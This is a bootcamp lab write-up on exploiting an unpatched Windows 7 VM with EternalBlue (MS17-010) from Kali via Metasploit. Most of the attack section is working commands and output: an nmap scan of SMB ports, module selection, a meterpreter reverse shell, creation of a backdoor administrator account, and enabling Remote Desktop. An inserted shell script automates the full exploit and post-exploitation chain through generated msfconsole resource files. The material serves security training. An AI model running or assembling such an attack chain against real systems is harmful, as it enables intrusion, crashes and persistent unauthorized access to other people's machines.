老男孩 (Old Boy) Network Security Bootcamp
- 1. Prerequisites
- 2. Configuring the Kali virtual machine
- 3. Building the Windows 7 Ultimate virtual machine
- 4. Attacking the target
- 5. Problems encountered
Use the content of this article responsibly and do not perform illegal operations; the author accepts no responsibility for misuse.
1. Prerequisites
- Where network security sits as a field and its current state
- Gateway: the node in a network that connects different networks and carries data between them; it routes and forwards traffic from one network to another.
2. Configuring the Kali virtual machine
- Download the Kali VM (the prebuilt VMware image archive was used directly, not an ISO install)
- Configure the network connection mode
  - Bridged: connectivity test succeeded
  - NAT: connectivity test failed (see section 5)
- Log in to the Kali VM: the default username and password are both kali
- Open a terminal and note the VM's IP address
- Switch to a root shell:
sudo su -
- Start the SSH service:
/etc/init.d/ssh start
- Make the SSH service start at boot:
update-rc.d ssh enable
- Connect to Kali remotely with xshell. Connect as the kali user and switch to root after logging in: by default sshd on Kali does not accept password logins for root.
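The SSH setup above as one script. This is an added example, not code from the original page or from the bootcamp; it uses the systemd equivalent of the page's two sysv commands, checks that sshd is actually listening before telling you where to point xshell, and reads command output from stdin in the helper functions so they can be tried on captured text without a live VM. The file name enable_ssh.sh and the sample addresses in the comments are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): the page's "start sshd, make it
# start at boot, find the IP for xshell" steps as one script, with a check that
# sshd is really listening. The parsing helpers read command output from stdin
# so they can be tried on captured text without a live VM.
# Usage on the Kali VM:  sudo bash enable_ssh.sh --apply
set -euo pipefail

# First non-loopback IPv4 address from `ip -o -4 addr show` (one line per
# address: "2: eth0    inet 192.168.1.23/24 brd ..."; field 4 is addr/prefix).
primary_ipv4() {
    awk '$2 != "lo" { split($4, a, "/"); print a[1]; exit }'
}

# 0 if `ss -tln` output on stdin shows a LISTEN socket bound to port 22.
ssh_listening() {
    grep -Eq '^LISTEN[[:space:]].*:22[[:space:]]'
}

apply_ssh_setup() {
    # systemd form of the page's "/etc/init.d/ssh start" + "update-rc.d ssh enable"
    systemctl enable --now ssh
    if ss -tln | ssh_listening; then
        echo "sshd is listening on TCP/22"
    else
        echo "sshd is not listening; see: journalctl -u ssh" >&2
        return 1
    fi
    # Kali's default sshd_config does not allow root password logins,
    # so xshell should connect as the kali user and 'sudo su -' afterwards.
    echo "xshell target: kali@$(ip -o -4 addr show | primary_ipv4)"
}

if [ "${1:-}" = "--apply" ]; then
    apply_ssh_setup
fi
```

Without `--apply` the file only defines the functions, so it can be sourced to test the parsers on saved output. The listening check is the step the page's troubleshooting section turns out to have needed: a started unit that is not bound to port 22 is indistinguishable from "no network" when all you see is xshell timing out.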
3. Building the Windows 7 Ultimate virtual machine
- Create the VM with the "Typical" wizard; nothing needs to be configured by hand
- Point the wizard at the installer disc image directly rather than choosing "install the operating system later": in the author's experience the latter route updates Windows 7 and patches the target vulnerability (MS17-010 was fixed by Microsoft's March 2017 update, so the target has to stay unpatched)
- After Windows 7 is installed, turn off the Windows Firewall
- Note the VM's IP address
4. Attacking the target
- How the attack works: a ready-made Metasploit exploit module shipped with Kali is run against a known, unpatched vulnerability on the target
- Vulnerability: EternalBlue on Windows 7 (MS17-010, a buffer overflow in the SMBv1 server driver srv.sys; EternalBlue itself is CVE-2017-0144)
- Detailed steps
- Switch Kali to the root account
sudo su -
  ┌──(kali㉿kali)-[~]
  └─$ sudo su -
  [sudo] password for kali:
  ┏━(Message from Kali developers)
  ┃
  ┃ We have kept /usr/bin/python pointing to Python 2 for backwards
  ┃ compatibility. Learn how to change this and avoid this message:
  ┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
  ┃
  ┗━(Run "touch ~/.hushlogin" to hide this message)
  ┌──(root💀kali)-[~]
  └─#
- Check that the target can be pinged from Kali
- Scan ports 139 and 445 (NetBIOS session service and SMB over TCP, the ports the Windows SMB server listens on; the module exploits SMBv1 on 445)
nmap -p 139,445 -Pn <target IP>
  ┌──(root💀kali)-[~]
  └─# nmap -p 139,445 -Pn 172.20.10.8
  139/tcp open  netbios-ssn
  445/tcp open  microsoft-ds
(what matters is that both ports show as open; -Pn skips the ping sweep so the scan still runs if ICMP is blocked)
- Enter the Kali attack console
msfconsole
  ┌──(root💀kali)-[~]
  └─# msfconsole
- Search for the EternalBlue modules
search ms17-010
  msf6 > search ms17-010

  Matching Modules
  ================

     #  Name                                           Disclosure Date  Rank     Check  Description
     -  ----                                           ---------------  ----     -----  -----------
     0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
     1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
     2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
     4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
     5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

  Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
(the index numbers belong to this particular search result, so "use 2" only means the EternalBlue module while this listing is the most recent search; module 1 is a non-destructive scanner that reports whether the host is vulnerable)
- View the module's details and which targets it supports; referring to it by index is convenient (index 2 here)
info 2
  msf6 > info 2

         Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       Module: exploit/windows/smb/ms17_010_eternalblue
     Platform: Windows
         Arch:
   Privileged: Yes
      License: Metasploit Framework License (BSD)
         Rank: Average
    Disclosed: 2017-03-14

  Provided by:
    Sean Dillon <sean.dillon@risksense.com>
    Dylan Davis <dylan.davis@risksense.com>
    Equation Group
    Shadow Brokers
    thelightcosine

  Available targets:
    Id  Name
    --  ----
    0   Windows 7 and Server 2008 R2 (x64) All Service Packs

  Check supported:
    Yes

  Basic options:
    Name           Current Setting  Required  Description
    ----           ---------------  --------  -----------
    RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT          445              yes       The target port (TCP)
    SMBDomain      .                no        (Optional) The Windows domain to use for authentication
    SMBPass                         no        (Optional) The password for the specified username
    SMBUser                         no        (Optional) The username to authenticate as
    VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
    VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

  Payload information:
    Space: 2000

  Description:
    This module is a port of the Equation Group ETERNALBLUE exploit, part of
    the FuzzBunch toolkit released by Shadow Brokers. There is a buffer
    overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated
    in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is
    subtracted into a WORD. The kernel pool is groomed so that overflow is
    well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
    completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the
    original may not trigger 100% of the time, and should be run
    continuously until triggered. It seems like the pool will get hot
    streaks and need a cool down period before the shells rain in again.
    The module will attempt to use Anonymous login, by default, to
    authenticate to perform the exploit. If the user supplies credentials
    in the SMBUser, SMBPass, and SMBDomain options it will use those
    instead. On some systems, this module may cause system instability and
    crashes, such as a BSOD or a reboot. This may be more likely with some
    payloads.

  References:
    https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
    https://www.cvedetails.com/cve/CVE-2017-0143/
    https://www.cvedetails.com/cve/CVE-2017-0144/
    https://www.cvedetails.com/cve/CVE-2017-0145/
    https://www.cvedetails.com/cve/CVE-2017-0146/
    https://www.cvedetails.com/cve/CVE-2017-0147/
    https://www.cvedetails.com/cve/CVE-2017-0148/
    https://github.com/RiskSense-Ops/MS17-010

  Also known as: ETERNALBLUE
(two things worth reading before running it: "Check supported: Yes" means the module's check command can confirm the host is vulnerable without touching the kernel pool, and the description itself warns that the exploit may not trigger every time and can BSOD or reboot the target; the only target is 64-bit Windows 7 / Server 2008 R2, which VERIFY_TARGET and VERIFY_ARCH enforce)
- Select the exploit module
use 2
  msf6 > use 2
  [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
(the reverse_tcp payload makes the target connect back to Kali on LHOST, which defaults to Kali's own address; with bridged networking the target can reach it directly)
- Set the target's IP address
set rhosts <target IP>
  msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.20.10.8
  rhosts => 172.20.10.8
- Run the exploit
run
  msf6 exploit(windows/smb/ms17_010_eternalblue) > run
  [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(the WIN banner means the kernel exploit landed and a meterpreter session follows; if it does not appear, the module's description says to run it again after a pause, and a blue screen on the Windows 7 VM is a known outcome rather than a sign of a misconfiguration)
- Drop into a cmd shell on the target
shell
  meterpreter > shell
  Process 2104 created.
  Channel 1 created.
  Microsoft Windows [Version 6.1.7600]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

  C:\Windows\system32>
(build 6.1.7600 is Windows 7 RTM with no service pack; the banner and command output from a Chinese Windows install arrive in code page 936 and show up as mojibake in the meterpreter channel, which is why the original transcript is unreadable here. Running chcp 65001 in that cmd shell switches it to UTF-8.)
- Create a user
  C:\Windows\system32>net user oldgirl 123 /add
  The command completed successfully.
- Add the user to the Administrators group
  C:\Windows\system32>net localgroup administrators oldgirl /add
(in the original session this was mistyped as "nat localgroup administrators oldgirl /add" and cmd answered "'nat' is not recognized as an internal or external command, operable program or batch file", so the user was never made an administrator; check the output of every net command rather than assuming it worked)
- Leave the target's cmd shell and return to meterpreter
  C:\Windows\system32>exit
- Enable Remote Desktop on the target
  meterpreter > run post/windows/manage/enable_rdp
  [*] Enabling Remote Desktop
  [*] RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode
  [*] The Terminal Services service is not set to auto, changing it to auto ...
  [*] Opening port in local firewall if necessary
  [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230519030303_default_172.20.10.8_host.windows.cle_231609.txt
  meterpreter >
- After this the target can be reached with Remote Desktop Connection, logging in with the account created above once it really is in the Administrators (or Remote Desktop Users) group. The cleanup resource file the module names undoes the RDP, service and firewall changes when the exercise is over.
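The whole attack procedure above, wrapped in a script. This is an added example and not code from the original page or from Metasploit: it confirms 139/445 are open from nmap's grepable output, then generates two msfconsole resource scripts, a non-destructive "check" stage (the smb_ms17_010 scanner plus the exploit module's own check) and an "exploit" stage that replays the page's post-exploitation commands. The target 172.20.10.8, attacker address 172.20.10.5, the oldgirl/123 account, the file names, and the assumption that the new meterpreter session gets id 1 are all mine; the verdict string it greps for is the one the scanner prints.

```shell
#!/usr/bin/env bash
# Added example, not code from the original page or from Metasploit itself.
# It wraps the page's steps (nmap -> msfconsole -> ms17_010_eternalblue ->
# net user / net localgroup / enable_rdp) in a two-stage script:
#   stage "check"   : scanner module + the exploit's own `check`, no exploit
#   stage "exploit" : exploit plus the post-exploitation steps from the page
# Assumed values: target 172.20.10.8, attacker 172.20.10.5, user oldgirl/123,
# and that the first meterpreter session is numbered 1.
set -euo pipefail

# 0 if both 139/tcp and 445/tcp are "open" in nmap grepable output on stdin
# (produce it with: nmap -p 139,445 -Pn -oG - <target>).
smb_ports_open() {
    awk '
        /Ports:/ {
            split($0, parts, "Ports: ")
            n = split(parts[2], entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")     # port/state/proto/owner/service/...
                if (f[2] == "open" && f[3] == "tcp") open[f[1]] = 1
            }
        }
        END { if (open["139"] && open["445"]) exit 0; exit 1 }'
}

# 0 if a saved msfconsole log (stdin) contains the scanner's vulnerable verdict.
scanner_says_vulnerable() {
    grep -q 'Host is likely VULNERABLE to MS17-010'
}

# Write an msfconsole resource script for the given stage to $out.
# Resource scripts run top to bottom with no branching, which is why the
# destructive part is a separate file: run "check" first, read the log,
# then run "exploit" only for a host the scanner reported as vulnerable.
build_ms17010_rc() {
    local stage="$1" rhost="$2" lhost="$3" out="$4"
    local user="${5:-oldgirl}" pass="${6:-123}"
    case "$stage" in
        check)
            cat > "$out" <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $rhost
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
check
exit
EOF
            ;;
        exploit)
            cat > "$out" <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
exploit -z
sessions -i 1 -c "net user $user $pass /add"
sessions -i 1 -c "net localgroup administrators $user /add"
use post/windows/manage/enable_rdp
set SESSION 1
run
EOF
            ;;
        *)
            echo "stage must be check or exploit" >&2
            return 1
            ;;
    esac
}

# Typical run from the Kali box (commented out so the file can be sourced):
#   nmap -p 139,445 -Pn -oG - 172.20.10.8 | smb_ports_open || exit 1
#   build_ms17010_rc check 172.20.10.8 172.20.10.5 /tmp/check.rc
#   msfconsole -q -r /tmp/check.rc -o /tmp/check.log
#   scanner_says_vulnerable < /tmp/check.log && {
#       build_ms17010_rc exploit 172.20.10.8 172.20.10.5 /tmp/exploit.rc
#       msfconsole -q -r /tmp/exploit.rc
#   }
```

The split into two resource files is deliberate: the exploit module's description says it can blue-screen the target, so the scanner verdict and the module's check are read by a human before anything destructive is queued. "exploit -z" opens the session without dropping into it, which is what lets the following sessions commands and the enable_rdp post module run unattended; the page's manual typo in net localgroup cannot recur because the command text comes from the script.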
5. Problems encountered
- No network connectivity in NAT mode
  - Attempt 1
    - Change: in the VMware Virtual Network Editor, changed the gateway from 10.0.0.254 to 10.0.0.1 so that it matched the gateway shown in the host's terminal
    - Result: failed
  - Attempt 2
    - Change: allowed the host firewall to accept ICMP requests from the VM
    - Result: failed
  - Attempt 3
    - Change: deleted the VM and reinstalled it while re-watching the lesson, using bridged mode instead of NAT
    - Result: success
    - Cause: after re-watching the video, I found that the remote-connection service had not been started in the Kali VM. I still have not found out why NAT mode does not work.
- Possible reasons for a VM having no connectivity (bridged mode)
  - The host's firewall blocks the VM's requests
  - The VM's IP address and gateway do not match the host's
  - The VMware virtual gateway is misconfigured
  - The remote-connection service was not started on the VM side
Title: 2023.5.15老男孩网络安全集训营第一节 (Old Boy Network Security Bootcamp, Lesson 1, 2023-05-15). Source: https://www.elefans.com/dongtai/1726787720a1084610.html